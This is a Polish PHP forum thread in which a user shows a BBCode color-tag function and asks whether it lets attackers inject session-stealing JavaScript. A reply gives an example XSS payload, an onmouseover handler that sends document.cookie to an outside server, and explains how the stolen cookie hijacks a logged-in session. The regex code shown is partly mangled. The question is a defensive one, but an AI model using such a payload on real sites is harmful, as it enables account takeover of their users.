Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> [html] & [js] bbcode - tag color
Ania-678
post
Post #1





Grupa: Zarejestrowani
Postów: 72
Pomógł: 0
Dołączył: 15.06.2007

Ostrzeżenie: (0%)
-----


Witam.

Mam bbcode z TAGiem color takiej budowy:

  1. <?php
  2. // bbcode
  3. function bbcode($str){
  4.  
  5. // Kolor tekstu
  6.  
  7. $str = preg_replace("#(.*?)#si", "<span style="color:2">3</span>", $str);
  8.  
  9. return $str;}
  10.  
  11. // bbcode
  12. function bbcode2($str){
  13. $str = preg_replace('#<span style="color:(http://)?(.*?)">(.*?)</span>#si', "3", $str);
  14.  
  15. // Kolor tekstu
  16. return $str;}
  17. ?>


No i doszły mnie słuchy iż w takie coś można "wszczepić" złośliwe js przechwytujące sesje i wysyłające na zewnętrzny serwer, czy to prawda...? Jeśli tak to jak się przed czymś takim bronić? (IMG:http://forum.php.pl/style_emoticons/default/worriedsmiley.gif)

Ten post edytował Ania-678 21.07.2007, 09:12:12
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
stoprocent
post
Post #2





Grupa: Zarejestrowani
Postów: 338
Pomógł: 2
Dołączył: 17.05.2003
Skąd: Kraków , Londyn

Ostrzeżenie: (0%)
-----


Dziala to tak ze ktos daje onmmouse over albo onclick albo inna akcje i dalesz czesc kodu wyglada tak np:
Kod
... onmouseover="document.location.href='http://serwer/zapisz.php?c='+document.cookies " ...


Pozwala to na ustawienie komus tego samego ciastka ktore ty masz z aktywna sesja np logowania.
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 14.10.2025 - 03:20